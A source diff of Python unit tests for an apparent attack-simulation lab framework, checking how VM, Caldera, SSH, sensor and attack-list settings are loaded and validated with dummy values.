def test_linux_is_valid_os(self):
""" Testing if windows is valid os """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"}))
self.assertEqual(mc.os(), "linux")
def test_missing_os(self):
""" The os is missing """
with self.assertRaises(ConfigurationError):
MachineConfig({"root": "systems/attacker1",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"})
def test_wrong_os(self):
""" The os is wrong """
with self.assertRaises(ConfigurationError):
MachineConfig({"root": "systems/attacker1",
"os": "BROKEN",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"})
def test_vagrant_is_valid_vmcontroller(self):
""" Testing if vagrant is valid vmcontroller """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1"}))
self.assertEqual(mc.vmcontroller(), "vagrant")
def test_vagrant_is_valid_vmcontroller_casefix(self):
""" Testing if vagrant is valid vmcontroller case fixxed"""
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "VAGRANT",
"vagrantfilepath": "systems",
},
"vm_name": "target1"})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "VAGRANT",
"vagrantfilepath": "systems",
},
"vm_name": "target1"}))
self.assertEqual(mc.vmcontroller(), "vagrant")
def test_invalid_vmcontroller(self):
""" Testing if vagrant is valid vmcontroller case fixxed"""
with self.assertRaises(ConfigurationError):
MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "BROKEN",
"vagrantfilepath": "systems",
},
"vm_name": "target1"})
def test_missing_vmcontroller_2(self):
""" Testing if vagrant is valid vmcontroller case fixxed"""
with self.assertRaises(ConfigurationError):
MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_name": "target1"})
def test_vagrant_is_valid_vmip(self):
""" Testing if vagrant is valid ip/url """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"ip": "kali",
"vagrantfilepath": "systems",
},
"vm_name": "target1"})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"ip": "kali",
"vagrantfilepath": "systems",
},
"vm_name": "target1"}))
self.assertEqual(mc.vm_ip(), "kali")
def test_missing_vmip(self):
""" Testing if missing vm ip is handled"""
vm_name = "target1"
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": vm_name})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": vm_name}))
self.assertEqual(mc.vm_ip(), vm_name)
def test_machinepath(self):
""" Testing machinepath setting """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False,
"machinepath": "foo"})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False,
"machinepath": "foo"}))
self.assertEqual(mc.machinepath(), "foo")
def test_machinepath_fallback(self):
""" Testing machinepath setting fallback to vmname"""
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.machinepath(), "target1")
def test_paw(self):
""" Testing for caldera paw """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"paw": "Bar",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"paw": "Bar",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.caldera_paw(), "Bar")
def test_paw_fallback(self):
""" Testing for caldera paw fallback """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.caldera_paw(), None)
def test_group(self):
""" Testing for caldera group """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"group": "Bar",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"group": "Bar",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.caldera_group(), "Bar")
def test_group_fallback(self):
""" Testing for caldera group fallback """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.caldera_group(), None)
def test_ssh_keyfile(self):
""" Testing keyfile config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"ssh_keyfile": "Bar",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"ssh_keyfile": "Bar",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.ssh_keyfile(), "Bar")
def test_ssh_keyfile_default(self):
""" Testing keyfile config default """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.ssh_keyfile(), None)
def test_ssh_user(self):
""" Testing ssh user config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"ssh_user": "Bob",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"ssh_user": "Bob",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.ssh_user(), "Bob")
def test_ssh_user_default(self):
""" Testing ssh user default config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.ssh_user(), "vagrant")
def test_ssh_password(self):
""" Testing ssh password config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"ssh_user": "Bob",
"ssh_password": "Ross",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"ssh_user": "Bob",
"ssh_password": "Ross",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.ssh_password(), "Ross")
def test_ssh_password_default(self):
""" Testing ssh password default config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertIsNone(mc.ssh_password())
def test_halt_needs_force_default(self):
""" Testing 'halt needs force' default config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.halt_needs_force(), False)
def test_halt_needs_force(self):
""" Testing 'halt needs force' config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.halt_needs_force(), True)
def test_vagrantfilepath(self):
""" Testing vagrantfilepath config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.vagrantfilepath(), "systems")
def test_vagrantfilepath_missing(self):
""" Testing missing vagrantfilepath config """
with self.assertRaises(ConfigurationError):
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap(DotMap({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"vm_type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False})))
mc.vagrantfilepath()
def test_sensors_empty(self):
""" Testing empty sensor config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"vm_type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.sensors(), [])
def test_sensors_set(self):
""" Testing empty sensor config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False,
"sensors": ["linux_idp", "test_sensor"]})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"vm_type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False,
"sensors": ["linux_idp", "test_sensor"]}))
self.assertEqual(mc.sensors(), ["linux_idp", "test_sensor"])
def test_vulnerabilities_empty(self):
""" Testing empty vulnerabilities config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"vm_type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False}))
self.assertEqual(mc.vulnerabilities(), [])
def test_vulnerabilities_set(self):
""" Testing empty vulnerabilities config """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False,
"vulnerabilities": ["PEBKAC", "USER"]})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"vm_type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False,
"vulnerabilities": ["PEBKAC", "USER"]}))
self.assertEqual(mc.vulnerabilities(), ["PEBKAC", "USER"])
def test_active_not_set(self):
""" machine active not set """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False,
"sensors": ["linux_idp", "test_sensor"]})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"vm_type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False,
"sensors": ["linux_idp", "test_sensor"]}))
self.assertEqual(mc.is_active(), True)
def test_active_is_false(self):
""" machine active is set to false """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False,
"active": False,
"sensors": ["linux_idp", "test_sensor"]})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"vm_type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False,
"active": False,
"sensors": ["linux_idp", "test_sensor"]}))
self.assertEqual(mc.is_active(), False)
def test_active_is_true(self):
""" machine active is set to true """
mc = MachineConfig({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False,
"active": True,
"sensors": ["linux_idp", "test_sensor"]})
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"halt_needs_force": True,
"vm_controller": {
"vm_type": "vagrant",
},
"vm_name": "target1",
"use_existing_machine": False,
"active": True,
"sensors": ["linux_idp", "test_sensor"]}))
self.assertEqual(mc.is_active(), True)
@ -509,43 +458,84 @@ class TestExperimentConfig(unittest.TestCase):
""" Existing, basic config file, testing the values are loaded properly """
ex = ExperimentConfig("tests/data/basic.yaml")
self.assertEqual(ex.raw_config["caldera"]["apikey"], "ADMIN123")
self.assertEqual(ex.raw_config.caldera.apikey, "ADMIN123")
self.assertEqual(ex.caldera_apikey(), "ADMIN123")
def test_loot_dir(self):
""" Test with existing loot dir """
def test_broken_apikey(self):
""" Test with broken config file """
ex = ExperimentConfig("tests/data/basic.yaml")
self.assertEqual(ex.loot_dir(), "loot")
e = ExperimentConfig("tests/data/basic.yaml")
e.raw_config = None
with self.assertRaises(ConfigurationError):
e.caldera_apikey()
def test_missing_loot_dir(self):
""" Test with missing loot dir """
def test_broken_lootdir(self):
""" Test with partially empty config file """
e = ExperimentConfig("tests/data/basic.yaml")
e.raw_config = None
with self.assertRaises(ConfigurationError):
ExperimentConfig("tests/data/basic_loot_missing.yaml")
e.loot_dir()
def test_missing_results(self):
""" Test with missing results """
def test_broken_caldera_obfuscator_conf(self):
""" Test with partially empty config file """
e = ExperimentConfig("tests/data/basic.yaml")
e.raw_config = None
with self.assertRaises(ConfigurationError):
ExperimentConfig("tests/data/basic_results_missing.yaml")
e.get_caldera_obfuscator()
def test_basic_loading_targets_read(self):
""" Targets in config: can be found """
ex = ExperimentConfig("tests/data/basic.yaml")
self.assertEqual(len(ex._targets), 2)
self.assertEqual(ex._targets[0].raw_config["vm_name"], "target1")
self.assertEqual(ex._targets[0].vmname(), "target1")
self.assertEqual(ex.targets()[0].vmname(), "target1")
def test_broken_caldera_jitter_conf(self):
""" Test with partially empty config file """
e = ExperimentConfig("tests/data/basic.yaml")
e.raw_config = None
with self.assertRaises(ConfigurationError):
e.get_caldera_jitter()
def test_broken_plugin_based_attacks(self):
""" Test with partially empty config file """
e = ExperimentConfig("tests/data/basic.yaml")
e.raw_config = None
with self.assertRaises(ConfigurationError):
e.get_plugin_based_attacks("windows")
def test_broken_caldera_attacks(self):
""" Test with partially empty config file """
e = ExperimentConfig("tests/data/basic.yaml")
e.raw_config = None
with self.assertRaises(ConfigurationError):
e.get_caldera_attacks("windows")
def test_broken_nap_time(self):
""" Test with partially empty config file """
e = ExperimentConfig("tests/data/basic.yaml")
e.raw_config = None
with self.assertRaises(ConfigurationError):
e.get_nap_time()
def test_broken_sensor_config(self):
""" Test with partially empty config file """
e = ExperimentConfig("tests/data/basic.yaml")
e.raw_config = None
with self.assertRaises(ConfigurationError):
e.get_sensor_config("doesntmatter")
def test_loot_dir(self):
""" Test with existing loot dir """
def test_basic_loading_attacker_read(self):
""" Attackers in config: can be found """
ex = ExperimentConfig("tests/data/basic.yaml")
self.assertEqual(len(ex._targets), 2)
self.assertEqual(ex._attackers[0].raw_config["vm_name"], "attacker")
self.assertEqual(ex._attackers[0].vmname(), "attacker")
self.assertEqual(ex.attackers()[0].vmname(), "attacker")
self.assertEqual(ex.attacker(0).vmname(), "attacker")
self.assertEqual(ex.loot_dir(), "loot")
def test_empty_config(self):
""" Test with empty config file """
with self.assertRaises(ConfigurationError):
ExperimentConfig("tests/data/empty.yaml")
def test_nicknames_missing(self):
""" Test when the machine nicknames are non existing """
@ -560,7 +550,7 @@ class TestExperimentConfig(unittest.TestCase):
def test_nicknames_present(self):
""" Test when the machine nicknames are there """
ex = ExperimentConfig("tests/data/attacker_has_empty_nicknames.yaml")
self.assertEqual(ex._targets[0].get_nicknames(), [1, 2, 3])
self.assertEqual(ex._targets[0].get_nicknames(), ["1", "2", "3"])
def test_missing_attack_config(self):
""" Getting attack config for a specific attack. Attack missing """
@ -576,14 +566,6 @@ class TestExperimentConfig(unittest.TestCase):
data = ex.attack_conf("hydra")
self.assertEqual(data["userfile"], "users.txt")
def test_attack_config_missing_attack_data(self):
""" Getting attack config for a specific attack: Missing """
ex = ExperimentConfig("tests/data/attacks_missing.yaml")
data = ex.attack_conf("missing")
self.assertEqual(data, {})
def test_missing_caldera_config_obfuscator(self):
""" A config file with no caldera config at all """
@ -620,27 +602,6 @@ class TestExperimentConfig(unittest.TestCase):
ex = ExperimentConfig("tests/data/attacks_perfect.yaml")
self.assertEqual(ex.get_caldera_jitter(), "08/15")
def test_nap_time(self):
""" nap time is set """
ex = ExperimentConfig("tests/data/basic.yaml")
self.assertEqual(ex.get_nap_time(), 5)
def test_nap_time_not_set(self):
""" nap time is not set """
ex = ExperimentConfig("tests/data/nap_time_missing.yaml")
self.assertEqual(ex.get_nap_time(), 0)
def test_kali_attacks_missing(self):
""" kali attacks entry fully missing from config """
ex = ExperimentConfig("tests/data/attacks_missing.yaml")
self.assertEqual(ex.get_plugin_based_attacks("linux"), [])
def test_kali_attacks_empty(self):
""" zero entries in kali attacks list """
@ -662,13 +623,6 @@ class TestExperimentConfig(unittest.TestCase):
self.assertEqual(ex.get_plugin_based_attacks("windows"), ["hydra", "medusa", "skylla"])
def test_caldera_attacks_missing(self):
""" caldera attacks entry fully missing from config """
ex = ExperimentConfig("tests/data/attacks_missing.yaml")
self.assertEqual(ex.get_caldera_attacks("linux"), [])
def test_kali_attacks_half(self):
""" kali attacks entry partially missing from config """
@ -720,13 +674,6 @@ class TestExperimentConfig(unittest.TestCase):
self.assertEqual(ex.get_sensor_config("missing_windows_sensor"), {})
def test_basic_sensor_entry_missing(self):
""" Test global configuration for a specific and missing sensor entry"""
ex = ExperimentConfig("tests/data/attacks_missing.yaml")
self.assertEqual(ex.get_sensor_config("windows_sensor"), {})
def test_basic_sensor_entry_empty(self):
""" Test global configuration for a specific and empty sensor entry"""

@ -1,5 +1,6 @@
import unittest
import os
from dotmap import DotMap
from app.machinecontrol import Machine
from app.exceptions import ConfigurationError
from app.config import MachineConfig
@ -15,167 +16,137 @@ class TestMachineControl(unittest.TestCase):
self.attack_logger = AttackLog(0)
def test_get_os_linux_machine(self):
m = Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"}, self.attack_logger)
self.assertEqual(m.get_os(), "linux")
def test_get_os_linux_machine_with_config_class(self):
mc = MachineConfig({"root": "systems/attacker1",
m = Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"})
m = Machine(mc, self.attack_logger)
"vm_name": "target3"}), self.attack_logger)
self.assertEqual(m.get_os(), "linux")
def test_get_os_missing(self):
with self.assertRaises(ConfigurationError):
Machine({"root": "systems/attacker1",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"
}, self.attack_logger)
def test_get_os_not_supported(self):
with self.assertRaises(ConfigurationError):
Machine({"root": "systems/attacker1",
"os": "nintendo_switch",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"}, self.attack_logger)
def test_get_os_linux_machine_with_config_class(self):
mc = MachineConfig(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"}))
m = Machine(mc, self.attack_logger)
self.assertEqual(m.get_os(), "linux")
def test_get_paw_good(self):
m = Machine({"root": "systems/attacker1",
"os": "linux",
"paw": "testme",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"}, self.attack_logger)
m = Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"paw": "testme",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"}), self.attack_logger)
self.assertEqual(m.get_paw(), "testme")
def test_get_paw_missing(self):
m = Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"
}, self.attack_logger)
m = Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"
}), self.attack_logger)
self.assertEqual(m.get_paw(), None)
def test_get_group_good(self):
m = Machine({"root": "systems/attacker1",
"os": "linux",
"group": "testme",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"}, self.attack_logger)
m = Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"group": "testme",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"}), self.attack_logger)
self.assertEqual(m.get_group(), "testme")
def test_get_group_missing(self):
m = Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"
}, self.attack_logger)
m = Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"
}), self.attack_logger)
self.assertEqual(m.get_group(), None)
def test_vagrantfilepath_missing(self):
with self.assertRaises(ConfigurationError):
Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
},
"vm_name": "target3"
}, self.attack_logger)
Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
},
"vm_name": "target3"
}), self.attack_logger)
def test_vagrantfile_missing(self):
with self.assertRaises(ConfigurationError):
Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "non_existing",
},
"vm_name": "target3"
}, self.attack_logger)
Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "non_existing",
},
"vm_name": "target3"
}), self.attack_logger)
def test_vagrantfile_existing(self):
m = Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"
}, self.attack_logger)
m = Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"
}), self.attack_logger)
self.assertIsNotNone(m)
def test_name_missing(self):
with self.assertRaises(ConfigurationError):
Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
}, self.attack_logger)
# test: auto generated, dir missing
def test_auto_generated_machinepath_with_path_missing(self):
with self.assertRaises(ConfigurationError):
Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "missing"
}, self.attack_logger)
Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "missing"
}), self.attack_logger)
# test manual config, dir missing
def test_configured_machinepath_with_path_missing(self):
with self.assertRaises(ConfigurationError):
Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3",
"machinepath": "missing"
}, self.attack_logger)
Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3",
"machinepath": "missing"
}), self.attack_logger)
# test auto generated, dir there (external/internal dirs must work !)
def test_auto_generated_machinepath_with_good_config(self):
m = Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"
}, self.attack_logger)
m = Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3"
}), self.attack_logger)
vagrantfilepath = os.path.abspath("systems")
ext = os.path.join(vagrantfilepath, "target3")
internal = os.path.join("/vagrant/", "target3")
@ -185,15 +156,15 @@ class TestMachineControl(unittest.TestCase):
# test: manual config, dir there (external/internal dirs must work !)
def test_configured_machinepath_with_good_config(self):
m = Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "missing",
"machinepath": "target3"
}, self.attack_logger)
m = Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "missing",
"machinepath": "target3"
}), self.attack_logger)
vagrantfilepath = os.path.abspath("systems")
ext = os.path.join(vagrantfilepath, "target3")
internal = os.path.join("/vagrant/", "target3")
@ -204,36 +175,23 @@ class TestMachineControl(unittest.TestCase):
# vm_controller missing
def test_configured_vm_controller_missing(self):
with self.assertRaises(ConfigurationError):
Machine({"root": "systems/attacker1",
"os": "linux",
"vm_name": "missing",
"machinepath": "target3"
}, self.attack_logger)
# vm_controller wrong
def test_configured_vm_controller_wrong_type(self):
with self.assertRaises(ConfigurationError):
Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "wrong_controller",
"vagrantfilepath": "systems",
},
"vm_name": "missing",
"machinepath": "target3"
}, self.attack_logger)
Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_name": "missing",
"machinepath": "target3"
}), self.attack_logger)
# Create caldera start command and verify it
def test_get_linux_caldera_start_cmd(self):
m = Machine({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3",
"group": "testgroup",
"paw": "testpaw"}, self.attack_logger)
m = Machine(DotMap({"root": "systems/attacker1",
"os": "linux",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3",
"group": "testgroup",
"paw": "testpaw"}), self.attack_logger)
m.set_caldera_server("http://www.test.test")
with patch.object(m.vm_manager, "get_playground", return_value="/vagrant/target3"):
cmd = m.create_start_caldera_client_cmd()
@ -241,16 +199,16 @@ class TestMachineControl(unittest.TestCase):
# Create caldera start command and verify it (windows)
def test_get_windows_caldera_start_cmd(self):
m = Machine({"root": "systems/attacker1",
"os": "windows",
"vm_controller": {
"type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3",
"group": "testgroup",
"paw": "testpaw",
"machinepath": "target2w"}, self.attack_logger)
m = Machine(DotMap({"root": "systems/attacker1",
"os": "windows",
"vm_controller": {
"vm_type": "vagrant",
"vagrantfilepath": "systems",
},
"vm_name": "target3",
"group": "testgroup",
"paw": "testpaw",
"machinepath": "target2w"}), self.attack_logger)
m.set_caldera_server("www.test.test")
cmd = m.create_start_caldera_client_cmd()
self.maxDiff = None

@ -0,0 +1,234 @@
import unittest
from app.pluginmanager import PluginManager
from app.attack_log import AttackLog
